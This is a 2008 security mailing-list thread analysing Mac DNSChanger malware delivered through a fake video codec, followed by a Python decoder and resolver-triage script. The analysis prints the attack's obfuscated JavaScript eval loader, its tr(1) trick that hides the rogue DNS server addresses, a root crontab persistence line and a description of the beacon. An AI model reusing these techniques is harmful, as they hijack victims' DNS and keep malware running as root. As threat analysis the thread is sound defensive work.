[nsp-sec] [ OT ] MacOS X malware
Rob Thomas
robt at cymru.com
Wed Apr 2 16:19:31 EDT 2008
Thanks, Brian!
Wise call on the null routing. Must...avoid...altering...the DDoS-RS... ;)
Brian Eckman wrote:
> Rob,
>
> I'm sure this isn't news to you, but it might help clarify things for
> others. This is the Mac equivalent of Zlob (aka generically as
> DNSChanger). The two DNS servers given to infected hosts will be within
> the 85.255.112.0/20 network - I think almost always within
> 85.255.112.0/22. Based on my observations, I'd guarantee there are over
> 229 infected Macs in Minnesota alone, not to mention 50x that in Windows
> boxes.
>
> I've heard other rumors (besides the livejournal link you provided) that
> RBN is involved with Zlob, but I've never heard more than highly
> speculative comments. Regardless, the folks behind this line of malware
> are clearly very well funded and well organized. It's getting disgusting
> how long this line of malware has been around and how many *millions*[1]
> of hosts have been infected, and yet there is little to no press
> attention given to it (and who knows how much/little LE attention). They
> own a massive number of domains, generate a huge quantity of malware,
> make millions off of numerous bogus anti-spyware programs (almost
> certainly created in house) as well as large commissions from some
> gray-ish anti-spyware, and historically, even commissions from affiliate
> networks such as (but not limited to) amazon.com's "Associates" program.
>
> We have been null routing 85.255.112.0/20 for nearly two years now, as
> well as some other Intercage IP space.
>
> Cheers,
> Brian
>
> [1]
> http://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspx
> provides some reference as to how big the Zlob problem is. One week
> after the Sept, 2007 MSRT was released, the Zlob family had been removed
> from 664,258 machines. This was the same month MSRT first got rid of
> Storm; that was removed from 274,372 machines in the same time period.
> Granted, Zlob had about a two year head start... (But I wonder how many
> infected machines had already been cleaned/reinstalled/recycled by then?)
>
> Rob Thomas wrote:
>> ----------- nsp-security Confidential --------
>>
>> Hi, team.
>>
>> Given the large number of Mac users in this community, and given that
>> this collection of dodgy web sites are infecting Windows and MacOS X,
>> I thought this was reasonably appropriate for this list. Some folks
>> on this list might want to take action against some of these IPs.
>>
>> Yes it's true - there is malware for the MacOS X platform. While this
>> report will cover a recent release, the malware itself isn't new and
>> hacking MacOS X isn't new, either.
>>
>> You can read a public blog post and some useful follow-ups at the
>> following URL:
>>
>> <http://tacit.livejournal.com/238112.html>
>>
>> Here is our analysis. Some of these links are rude even in name, and
>> all of them are unsafe.
>>
>> The fun begins with at least one porn site. The site brings the user
>> through a few redirects to a site here:
>>
>> 88.85.72.147
>>
>> AS    | IP           | BGP Prefix    | CC | Registry | Allocated  | AS Name
>> 35415 | 88.85.72.147 | 88.85.64.0/19 | NL | ripencc  | 2006-02-08 | WEBAZILLA WebaZilla European Network
>>
>> The page there loads some fun Javascript:
>>
>> var str=["332", "331", "331", "331", "440", "419", "436",
>> "354", "434", "433", "440", "383", "370", "381", "332",
>> "331", "331", "331", "424", "439", "432", "421", "438",
>> "427", "433", "432", "354", "443", "441", "439", "427",
>> "422", "420", "430", "444", "433", "427", "362", "435",
>> "439", "423", "436", "443", "363", "445", "332", "331",
>> "331", "331", "331", "441", "427", "432", "422", "433",
>> "441", "368", "430", "433", "421", "419", "438", "427",
>> "433", "432", "383", "361", "426", "438", "438", "434",
>> "380", "369", "369", "430", "419", "432", "422", "427",
>> "432", "425", "426", "419", "430", "430", "368", "421",
>> "433", "431", "369", "427", "432", "368", "421", "425",
>> "427", "385", "373", "361", "381", "332", "331", "331",
>> "331", "447"];
>> var temp='';
>> var gg='';
>> for (i=0; i<str.length; i++){
>> gg=str[i]-322;
>> temp=temp+String.fromCharCode(gg);
>> }
>> eval(temp);
>>
>> This translates to (I've heavily obfuscated the URL below):
>>
>> var pov=0;
>> function ywuidblzoi(query){
>> window.location='h x x p : / / landinghall . com / in.cgi?3';
>> }
>>
>> The host landinghall.com resolves to 88.214.202.180, located at the
>> following provider:
>>
>> AS    | IP             | BGP Prefix      | CC | Registry | Allocated  | AS Name
>> 23393 | 88.214.202.180 | 88.214.192.0/18 | GB | ripencc  | 2006-01-18 | ISPRIME - ISPrime, Inc.
>>
>> In addition to the malware, the images are extremely graphic.
>> Consider yourself warned.
>>
>> The web site determines the visitor's OS and then decides which malware
>> to offer. This is masked as a video codec to play the porn
>> available on this "PornTube" (their name) site.
>>
>> Note well that if the browser has pop-ups blocked, there is no risk to
>> MacOS X users so far as we can discern.
>>
>> At this point the MacOS X user is prompted to download a disk image for
>> installation. This image is named 1023.dmg and is served from:
>>
>> 64.28.178.27, 64-28-178-27-rev.cernel.net
>>
>> AS    | IP           | BGP Prefix     | CC | Registry | Allocated  | AS Name
>> 27595 | 64.28.178.27 | 64.28.176.0/20 | US | arin     | 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> The MacOS X user *must* provide his or her password to enable the
>> installation of this malware masked as a video player. This is not a
>> 0day attack - it is social engineering.
>>
>> The preinstall and preupgrade scripts are the same and contain 25 lines.
>> Both use an interesting obfuscation technique - the Unix tr(1) command.
>>
>> The script first cat(1)'s itself and pipes the bottom 23 lines of itself
>> through tr(1). The first tr(1) round does the following (I've cleaned
>> this up a bit to make it more legible):
>>
>> tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv > 1
>>
>> It next sets two variables:
>>
>> s1 = cx.zxx.aas.xd
>> s2 = cx.zxx.aaz.ace
>>
>> The script called "1" is now run with these two variables as arguments,
>> piped through tr(1) again (line split to make it more legible):
>>
>> sh 1 `echo $s1|tr qazwsxedcr 0123456789` \
>> `echo $s2| tr qazwsxedcr 0123456789`
>>
>> The tr(1) command translates those two "strings" into the following two
>> IP addresses:
>>
>> s1 = 85.255.114.57
>> s2 = 85.255.112.186
>>
>> Those IPs belong to:
>>
>> AS    | IP            | BGP Prefix      | CC | Registry | Allocated  | AS Name
>> 27595 | 85.255.114.57 | 85.255.114.0/23 | UA | ripencc  | 2005-06-16 | INTERCAGE - InterCage, Inc.
>>
>> AS    | IP             | BGP Prefix      | CC | Registry | Allocated  | AS Name
>> 36445 | 85.255.112.186 | 85.255.112.0/24 | UA | ripencc  | 2005-06-16 | CERNEL-ASN - Cernel, Inc
>>
>> The script called "1" looks for some basic IPv4 settings on the Mac.
>> It then replaces the DNS name servers in the netinfo database with
>> 85.255.114.57 and 85.255.112.186. Any DNS queries from the compromised
>> Mac are now sent to these two name servers.
>>
>> Both 85.255.114.57 and 85.255.112.186 are open to recursion, of course.
>>
>> These IPs are no stranger to badness. We count 17 distinct samples in
>> our malware menagerie that reference 85.255.114.57. The host at
>> 85.255.112.186 has been involved with at least 60 malware samples that
>> hijack DNS settings.
>>
>> If a query is made for a non-existent DNS RR, these DNS name servers
>> return an answer of 64.28.185.108.
>>
>> 64.28.185.108, 64-28-185-108-rev.cernel.net
>>
>> AS    | IP            | BGP Prefix     | CC | Registry | Allocated  | AS Name
>> 27595 | 64.28.185.108 | 64.28.176.0/20 | US | arin     | 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> The script then installs itself into root's crontab as:
>>
>> * * * * * /Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1"
>>
>> By default there is no root crontab on MacOS X, so this one really
>> stands out.
>>
>> The QuickTime.xpt script is just a copy of the "1" script. This will
>> now run once per minute, as root, ensuring the malware and the DNS
>> changes aren't removed or lost for long.
>>
>> A Perl script named "sendreq" is run and deleted. This script is a
>> beacon, sending the output of "uname -p" (the machine processor
>> architecture name, e.g. "i386") and the hostname(1) command to a web
>> server. The web server is:
>>
>> 64.28.188.220, 64-28-188-220-rev.cernel.net
>>
>> AS    | IP            | BGP Prefix     | CC | Registry | Allocated  | AS Name
>> 27595 | 64.28.188.220 | 64.28.176.0/20 | US | arin     | 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> This is done as a HTTP GET command from the compromised Mac, with the
>> Accept-Language: field set to the information obtained from the
>> uname(1) and hostname(1) commands run on the compromised Mac.
>>
>> We see at least 227 victims, mostly in the US.
>>
>> Thanks,
>> Rob.
--
Rob Thomas
Team Cymru
The WHO and WHY team
http://www.team-cymru.org/
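The two obfuscation layers in Rob's analysis above (the JavaScript string-array loader that feeds eval(), and the tr(1)-encoded resolver addresses set by the installer script), decoded in Python as an added example that is not part of the original thread. The 85.255.112.0/20 triage check follows Brian's observation about where the rogue resolvers live; the function names are mine, and the array is copied from the post.

```python
import ipaddress

# Layer 1: the JavaScript string-array loader quoted in the post. Every entry
# minus 322 is an ASCII code; the joined text is what the page hands to eval().
# Array copied from the post, order preserved.
STR = [332, 331, 331, 331, 440, 419, 436, 354, 434, 433, 440, 383, 370, 381, 332,
       331, 331, 331, 424, 439, 432, 421, 438, 427, 433, 432, 354, 443, 441, 439,
       427, 422, 420, 430, 444, 433, 427, 362, 435, 439, 423, 436, 443, 363, 445,
       332, 331, 331, 331, 331, 441, 427, 432, 422, 433, 441, 368, 430, 433, 421,
       419, 438, 427, 433, 432, 383, 361, 426, 438, 438, 434, 380, 369, 369, 430,
       419, 432, 422, 427, 432, 425, 426, 419, 430, 430, 368, 421, 433, 431, 369,
       427, 432, 368, 421, 425, 427, 385, 373, 361, 381, 332, 331, 331, 331, 447]


def decode_charcodes(values, offset=322):
    """Undo the str[i]-322 / String.fromCharCode loop without evaluating it."""
    return "".join(chr(int(v) - offset) for v in values)


# Layer 2: the installer's tr(1) trick. The two "strings" become IPv4 addresses
# once the letters qazwsxedcr are mapped onto the digits 0-9.
TR_FROM, TR_TO = "qazwsxedcr", "0123456789"
S1, S2 = "cx.zxx.aas.xd", "cx.zxx.aaz.ace"  # s1 and s2 as set by the script


def tr(text, from_chars, to_chars):
    """Python equivalent of `echo $text | tr from_chars to_chars`."""
    return text.translate(str.maketrans(from_chars, to_chars))


def decode_dns_servers(s1=S1, s2=S2):
    return [tr(s1, TR_FROM, TR_TO), tr(s2, TR_FROM, TR_TO)]


# Triage: Brian notes the rogue resolvers always sit inside 85.255.112.0/20.
ROGUE_RESOLVER_NET = ipaddress.ip_network("85.255.112.0/20")


def is_rogue_resolver(ip):
    return ipaddress.ip_address(ip) in ROGUE_RESOLVER_NET


def suspicious_resolvers(resolvers):
    """Given a host's configured name servers, return those in the rogue block."""
    return [r for r in resolvers if is_rogue_resolver(r)]


if __name__ == "__main__":
    decoded = decode_charcodes(STR)
    print(decoded.strip().splitlines()[0])  # first statement of the hidden script
    print(suspicious_resolvers(decode_dns_servers() + ["8.8.8.8"]))
```

Feeding a Mac's configured name servers into suspicious_resolvers() is the quickest way to triage a suspected infection from this campaign; the decoded JavaScript matches the de-obfuscated redirect Rob shows in his post.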